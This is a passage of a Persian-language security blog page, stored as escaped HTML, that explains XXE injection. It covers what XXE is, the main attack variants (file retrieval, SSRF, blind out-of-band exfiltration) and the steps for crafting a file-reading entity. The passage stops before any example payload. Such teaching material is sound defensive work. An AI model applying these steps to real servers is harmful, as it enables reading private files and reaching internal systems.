\u0686\u06cc\u0633\u062a\u061f<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1b766c9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1b766c9\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-958ac98\" data-id=\"958ac98\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-364d597 elementor-widget elementor-widget-text-editor\" data-id=\"364d597\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"xxe-injection\"><strong>\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc <\/strong><strong>XXE<\/strong><strong> \u0686\u06cc\u0633\u062a\u061f<\/strong><\/h3>\n<p style=\"text-align: justify;\">\u062a\u0632\u0631\u06cc\u0642 XXE (\u0645\u062e\u0641\u0641 XML External Entity) \u0646\u0648\u0639\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062f\u0631 \u0627\u0645\u0646\u06cc\u062a \u0648\u0628 \u0627\u0633\u062a \u06a9\u0647 \u06cc\u06a9 \u0645\u0647\u0627\u062c\u0645 \u0628\u0647 \u0648\u0627\u0633\u0637\u0647\u200c\u06cc \u0622\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062f\u0631 \u0641\u0631\u0627\u06cc\u0646\u062f \u067e\u0631\u062f\u0627\u0632\u0634 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc XML \u062a\u0648\u0633\u0637 \u06cc\u06a9 \u0648\u0628\u200c\u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0645\u062f\u0627\u062e\u0644\u0647 \u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u0639\u0645\u0648\u0644\u0627 \u0645\u0647\u0627\u062c\u0645 \u0631\u0627 \u0642\u0627\u062f\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc\u06cc \u0631\u0627 \u06a9\u0647 \u0631\u0648\u06cc \u0641\u0627\u06cc\u0644\u200c\u0633\u06cc\u0633\u062a\u0645 \u0633\u0631\u0648\u0631 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u0646\u062f \u0645\u0634\u0627\u0647\u062f\u0647 \u06a9\u0646\u062f\u060c \u0648 \u0628\u0627 \u0647\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0628\u06a9\u200c\u0627\u0646\u062f \u06cc\u0627 \u062e\u0627\u0631\u062c\u06cc \u06a9\u0647 \u062e\u0648\u062f \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0642\u0627\u062f\u0631 \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0622\u0646 \u0628\u0627\u0634\u062f\u060c \u062a\u0639\u0627\u0645\u0644 \u06a9\u0646\u062f.<\/p>\n<p style=\"text-align: justify;\">\u062f\u0631 \u0628\u0639\u0636\u06cc \u0645\u0648\u0627\u0631\u062f\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0633\u0637\u062d \u06cc\u06a9 \u062d\u0645\u0644\u0647\u200c\u06cc XXE \u0631\u0627 \u0628\u0627\u0644\u0627\u062a\u0631 \u0628\u0628\u0631\u062f (\u06cc\u0627 \u0628\u0647 \u0627\u0635\u0637\u0644\u0627\u062d \u062d\u0645\u0644\u0647 \u0631\u0627 Escalate \u06a9\u0646\u062f) \u0648 \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a SSRF (\u0645\u062e\u0641\u0641 Sever Side Request Forgery \u062a\u0648\u0644\u06cc\u062f \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a\u200c\u0647\u0627\u06cc \u062c\u0639\u0644\u06cc \u0633\u0645\u062a \u0633\u0631\u0648\u0631) \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647 \u0648 \u0627\u0632 \u0627\u06cc\u0646 \u0637\u0631\u06cc\u0642\u060c \u0628\u0647 \u0633\u0631\u0648\u0631\u06cc \u06a9\u0647 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0631\u0648\u06cc \u0622\u0646 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f\u060c \u06cc\u0627 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u200c\u0647\u0627\u06cc \u0628\u06a9\u200c\u0627\u0646\u062f \u062f\u06cc\u06af\u0631 \u062f\u0633\u062a\u0631\u0633\u06cc \u067e\u06cc\u062f\u0627 \u06a9\u0646\u062f.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0f5820a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0f5820a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c653e1e\" data-id=\"c653e1e\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b04771a elementor-widget elementor-widget-text-editor\" data-id=\"b04771a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2 id=\"occurance\">\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f<\/h2>\n\u0628\u0639\u0636\u06cc \u0627\u0632 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646\u200c\u0647\u0627\u060c \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0628\u06cc\u0646 \u0645\u0631\u0648\u0631\u06af\u0631 \u0648 \u0633\u0631\u0648\u0631 \u0631\u0627 \u062f\u0631 \u0642\u0627\u0644\u0628 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc XML \u0627\u0646\u062a\u0642\u0627\u0644 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f. \u0627\u06cc\u0646 \u0646\u0648\u0639 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646\u200c\u0647\u0627 \u062a\u0642\u0631\u06cc\u0628\u0627 \u0647\u0645\u06cc\u0634\u0647 \u0627\u0632 \u06cc\u06a9 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647\u200c\u06cc \u0627\u0633\u062a\u0627\u0646\u062f\u0627\u0631\u062f \u06cc\u0627 API \u0645\u062a\u0646\u0627\u0633\u0628 \u0628\u0627 \u067e\u0644\u062a\u0641\u0631\u0645 \u062e\u0648\u062f \u0628\u0631\u0627\u06cc \u067e\u0631\u062f\u0627\u0632\u0634 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc XML \u0631\u0648\u06cc \u0633\u0631\u0648\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f. \u0622\u0633\u06cc\u0628\u200c\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE \u0628\u0647 \u0627\u06cc\u0646 \u062e\u0627\u0637\u0631 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u0646\u062f \u06a9\u0647 XML \u062f\u0631 \u062a\u0639\u0631\u06cc\u0641\u00a0 \u062e\u0648\u062f \u0630\u0627\u062a\u0627\u064b \u0627\u0645\u06a9\u0627\u0646\u0627\u062a\u06cc \u062f\u0627\u0631\u062f \u06a9\u0647 \u0628\u0627\u0644\u0642\u0648\u0647 \u062e\u0637\u0631\u0646\u0627\u06a9 \u0647\u0633\u062a\u0646\u062f\u060c \u0648 \u062d\u062a\u06cc \u0627\u06af\u0631 \u0628\u0631\u062e\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646\u0627\u062a \u0645\u0648\u0631\u062f \u0646\u06cc\u0627\u0632 \u06cc\u06a9 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0646\u0628\u0627\u0634\u062f\u060c \u0628\u0627\u0632 \u0647\u0645 \u067e\u0627\u0631\u0633\u0631\u0647\u0627\u06cc<sup>*<\/sup> \u0627\u0633\u062a\u0627\u0646\u062f\u0627\u0631\u062f XML \u0627\u0632 \u062a\u0645\u0627\u0645 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646\u0627\u062a \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.\n\n\u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u067e\u06cc\u0634 \u0627\u0632 \u0627\u06cc\u0646 \u06af\u0641\u062a\u06cc\u0645\u060c \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u062f\u0631 XML\u060c \u0646\u0648\u0639\u06cc \u0627\u0632 Custom Entity \u0647\u0633\u062a\u0646\u062f \u06a9\u0647 \u0645\u0642\u062f\u0627\u0631 \u062a\u0639\u0631\u06cc\u0641\u200c\u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0622\u0646\u200c\u0647\u0627\u060c \u0627\u0632 \u062c\u0627\u06cc\u06cc \u062e\u0627\u0631\u062c \u0627\u0632 DTD \u06a9\u0647 \u062f\u0631 \u0622\u0646 \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647\u200c\u0627\u0646\u062f \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u06cc\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc \u0627\u0632 \u0645\u0646\u0638\u0631 \u0627\u0645\u0646\u06cc\u062a \u0627\u0647\u0645\u06cc\u062a \u0648\u06cc\u0698\u0647\u200c\u0627\u06cc \u062f\u0627\u0631\u0646\u062f\u060c \u0632\u06cc\u0631\u0627 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u0648\u0631\u0646\u062f \u06a9\u0647 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0628\u0631\u0627\u0633\u0627\u0633 \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u06cc\u06a9 \u0622\u062f\u0631\u0633 \u0641\u0627\u06cc\u0644 \u06cc\u0627 URL \u062a\u0639\u0631\u06cc\u0641 \u0634\u0648\u062f.\n\n<em>* <\/em><em>XML Parser<\/em><em> \u06cc\u0627 <\/em><em>XML<\/em><em> \u067e\u0631\u0648\u0633\u0633\u0648\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u06cc\u0627 \u0645\u0627\u0698\u0648\u0644\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0648\u0638\u06cc\u0641\u0647\u200c\u06cc \u062a\u062c\u0632\u06cc\u0647\u200c\u06cc \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc <\/em><em>XML<\/em><em> \u0631\u0627 \u062f\u0627\u0631\u062f \u062a\u0627 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0622\u0646\u200c\u0647\u0627 \u0642\u0627\u0628\u0644 \u062e\u0648\u0627\u0646\u062f\u0646 \u0648 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0628\u0627\u0634\u062f. <\/em>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-fdbdb67 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"fdbdb67\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-62fa4c5\" data-id=\"62fa4c5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ab2c9c6 elementor-widget elementor-widget-image\" data-id=\"ab2c9c6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"780\" height=\"439\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/1-Copy-min-1.jpg\" class=\"attachment-large size-large wp-image-11088\" alt=\"xxe \u0686\u06cc\u0633\u062a\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/1-Copy-min-1.jpg 830w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/1-Copy-min-1-300x169.jpg 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/1-Copy-min-1-768x432.jpg 768w\" sizes=\"(max-width: 780px) 100vw, 780px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-5fc9cad elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"5fc9cad\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-83a1694\" data-id=\"83a1694\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7427835 elementor-button-info elementor-align-center elementor-widget elementor-widget-button\" data-id=\"7427835\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-md\" href=\"https:\/\/liangroup.net\/blog\/what-is-xss-vulnerability\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">\u062d\u0645\u0644\u0647 XSS \u0686\u06cc\u0633\u062a\u061f<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-14c67df elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"14c67df\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-84b13c5\" data-id=\"84b13c5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c3fdc4a elementor-widget elementor-widget-text-editor\" data-id=\"c3fdc4a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"types\"><span style=\"font-size: 12pt;\">\u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a XXE \u06a9\u062f\u0627\u0645\u0646\u062f\u061f<\/span><\/h3>\n\u062d\u0645\u0644\u0627\u062a XXE \u0627\u0646\u0648\u0627\u0639 \u0645\u062e\u062a\u0644\u0641\u06cc \u062f\u0627\u0631\u0646\u062f. \u0686\u0646\u062f \u0646\u0648\u0639 \u0627\u0632 \u062d\u0645\u0644\u0627\u062a XXE Injection \u0639\u0628\u0627\u0631\u062a\u0646\u062f \u0627\u0632:\n<ul>\n \t<li><strong>\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a XXE \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627: \u062f\u0631 \u0627\u06cc\u0646 \u0646\u0648\u0639 \u062d\u0645\u0644\u0647 \u06cc\u06a9 External Entity \u0628\u0627 \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u06cc\u06a9 \u0641\u0627\u06cc\u0644 \u062e\u0627\u0635 \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u0634\u0648\u062f\u060c \u0648 \u0627\u06cc\u0646 \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u062f\u0631 \u067e\u0627\u0633\u062e \u0648\u0628\u200c\u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f.<\/strong><\/li>\n \t<li><strong>\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a XXE \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0647 SSRF: \u062f\u0631 \u0627\u06cc\u0646 \u0646\u0648\u0639 \u062d\u0645\u0644\u0647 \u06cc\u06a9 External Entity \u0628\u0627 \u0644\u06cc\u0646\u06a9 \u062d\u0627\u0648\u06cc \u0622\u062f\u0631\u0633 \u06cc\u06a9 \u0633\u06cc\u0633\u062a\u0645 \u0628\u06a9\u200c\u0627\u0646\u062f \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/strong><\/li>\n \t<li><strong>\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a blind XXE \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u062f\u0627\u062f\u0647 \u0628\u0647 \u0635\u0648\u0631\u062a out-of-band: \u062f\u0631 \u0627\u06cc\u0646 \u0646\u0648\u0639 \u062d\u0645\u0644\u0647\u060c \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u0627\u0632 \u0633\u0631\u0648\u0631 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645\u06cc \u0627\u0646\u062a\u0642\u0627\u0644 \u062f\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f \u06a9\u0647 \u062f\u0631 \u06a9\u0646\u062a\u0631\u0644 \u0645\u0647\u0627\u062c\u0645 \u0627\u0633\u062a.<\/strong><\/li>\n \t<li><strong>\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a blind XXE \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u062f\u0627\u062f\u0647\u200c\u0647\u0627 \u0648 \u067e\u06cc\u0627\u0645\u200c\u0647\u0627\u06cc \u062e\u0637\u0627: \u062f\u0631 \u0627\u06cc\u0646 \u0646\u0648\u0639 \u062d\u0645\u0644\u0647\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0627\u0639\u062b \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 parsing error* \u0634\u0648\u062f \u06a9\u0647 \u062d\u0627\u0648\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u0627\u0633\u062a.<\/strong><\/li>\n<\/ul>\n<strong><span style=\"font-size: 8pt;\">* Parsing Error\u060c \u062e\u0637\u0627\u06cc \u067e\u0627\u0631\u0633\u0631 \u06cc\u0627 \u062e\u0637\u0627\u06cc \u062a\u062c\u0632\u06cc\u0647\u060c \u0646\u0648\u0639\u06cc \u0627\u0632 \u062e\u0637\u0627 \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 \u067e\u0627\u0631\u0633\u0631 \u062a\u0648\u0644\u06cc\u062f \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u0628\u0647 \u0627\u06cc\u0646 \u0645\u0639\u0646\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u0647\u0631 \u062f\u0644\u06cc\u0644\u06cc\u060c \u067e\u0627\u0631\u0633\u0631 \u0646\u062a\u0648\u0627\u0646\u0633\u0647 \u0645\u062d\u062a\u0648\u0627\u06cc \u0641\u0627\u06cc\u0644 \u0631\u0627 \u062a\u062c\u0632\u06cc\u0647 \u06a9\u0646\u062f \u0648 \u0628\u062e\u0648\u0627\u0646\u062f. \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 \u0627\u06af\u0631 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062e\u0627\u0631\u062c\u06cc \u0631\u0627 \u0628\u0627 \u067e\u0631\u0648\u062a\u06a9\u0644 file:\/\/ \u0648 \u0622\u062f\u0631\u0633\u06cc \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f\u060c \u0647\u0646\u06af\u0627\u0645 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0622\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc\u060c \u0628\u0627 \u0627\u06cc\u0646 \u0627\u0631\u0648\u0631 \u0645\u0648\u0627\u062c\u0647 \u0645\u06cc\u200c\u0634\u0648\u06cc\u0645.<\/span><\/strong>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d309f12 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d309f12\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-632b94e\" data-id=\"632b94e\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-75a67d8 elementor-widget elementor-widget-text-editor\" data-id=\"75a67d8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"file-retrieval\"><span style=\"font-size: 12pt;\">\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a XXE \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u00a0<\/span><\/h3>\n\u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u06cc\u06a9 \u062d\u0645\u0644\u0647\u200c\u06cc \u062a\u0632\u0631\u06cc\u0642 XXE \u06a9\u0647 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0627 \u0627\u0632 \u0641\u0627\u06cc\u0644\u200c\u0633\u06cc\u0633\u062a\u0645 \u0633\u0631\u0648\u0631 \u0628\u0647 \u062f\u0633\u062a \u0622\u0648\u0631\u062f\u060c \u0628\u0627\u06cc\u062f \u062f\u0648 \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0631 \u0641\u0627\u06cc\u0644 XML \u062b\u0628\u062a\u200c\u0634\u062f\u0647 \u062f\u0631 \u0648\u0628\u200c\u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u06cc\u062f:\n<ul>\n \t<li><span style=\"font-size: 10pt;\"><strong>\u06cc\u06a9 \u0639\u0646\u0635\u0631 DOCTYPE \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u062f (\u06cc\u0627 \u0627\u06af\u0631 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f \u0622\u0646 \u0631\u0627 \u0648\u06cc\u0631\u0627\u06cc\u0634 \u06a9\u0646\u06cc\u062f) \u0648 \u062f\u0631 \u0622\u0646 \u06cc\u06a9 External Entity \u062d\u0627\u0648\u06cc \u0622\u062f\u0631\u0633 \u0622\u0646 \u0641\u0627\u06cc\u0644 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u062f.<\/strong><\/span><\/li>\n \t<li><span style=\"font-size: 10pt;\"><strong>\u062f\u0631 \u0641\u0627\u06cc\u0644 XML \u06a9\u0647 \u0628\u0627 \u067e\u0627\u0633\u062e \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f\u060c \u0645\u0642\u0627\u062f\u06cc\u0631 \u06cc\u06a9 \u062f\u0627\u062f\u0647 \u0631\u0627 \u0628\u0647 \u06af\u0648\u0646\u0647\u200c\u0627\u06cc \u0648\u06cc\u0631\u0627\u06cc\u0634 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u0627\u0632 \u0622\u0646 External Entity \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f<\/strong><\/span>.<\/li>\n<\/ul>\n\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u06cc\u06a9 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u062e\u0631\u06cc\u062f \u0631\u0627 \u062f\u0631 \u0646\u0638\u0631 \u0628\u06af\u06cc\u0631\u06cc\u062f \u06a9\u0647 \u0628\u0627 \u0627\u0631\u0633\u0627\u0644 \u0641\u0627\u06cc\u0644 XML \u0632\u06cc\u0631 \u0628\u0647 \u0633\u0631\u0648\u0631\u060c \u0645\u0648\u062c\u0648\u062f\u06cc \u06cc\u06a9 \u0645\u062d\u0635\u0648\u0644 \u062e\u0627\u0635 \u062f\u0631 \u0627\u0646\u0628\u0627\u0631 \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-12f1e14 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"12f1e14\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-125114e\" data-id=\"125114e\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0027100 elementor-widget elementor-widget-text-editor\" data-id=\"0027100\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p 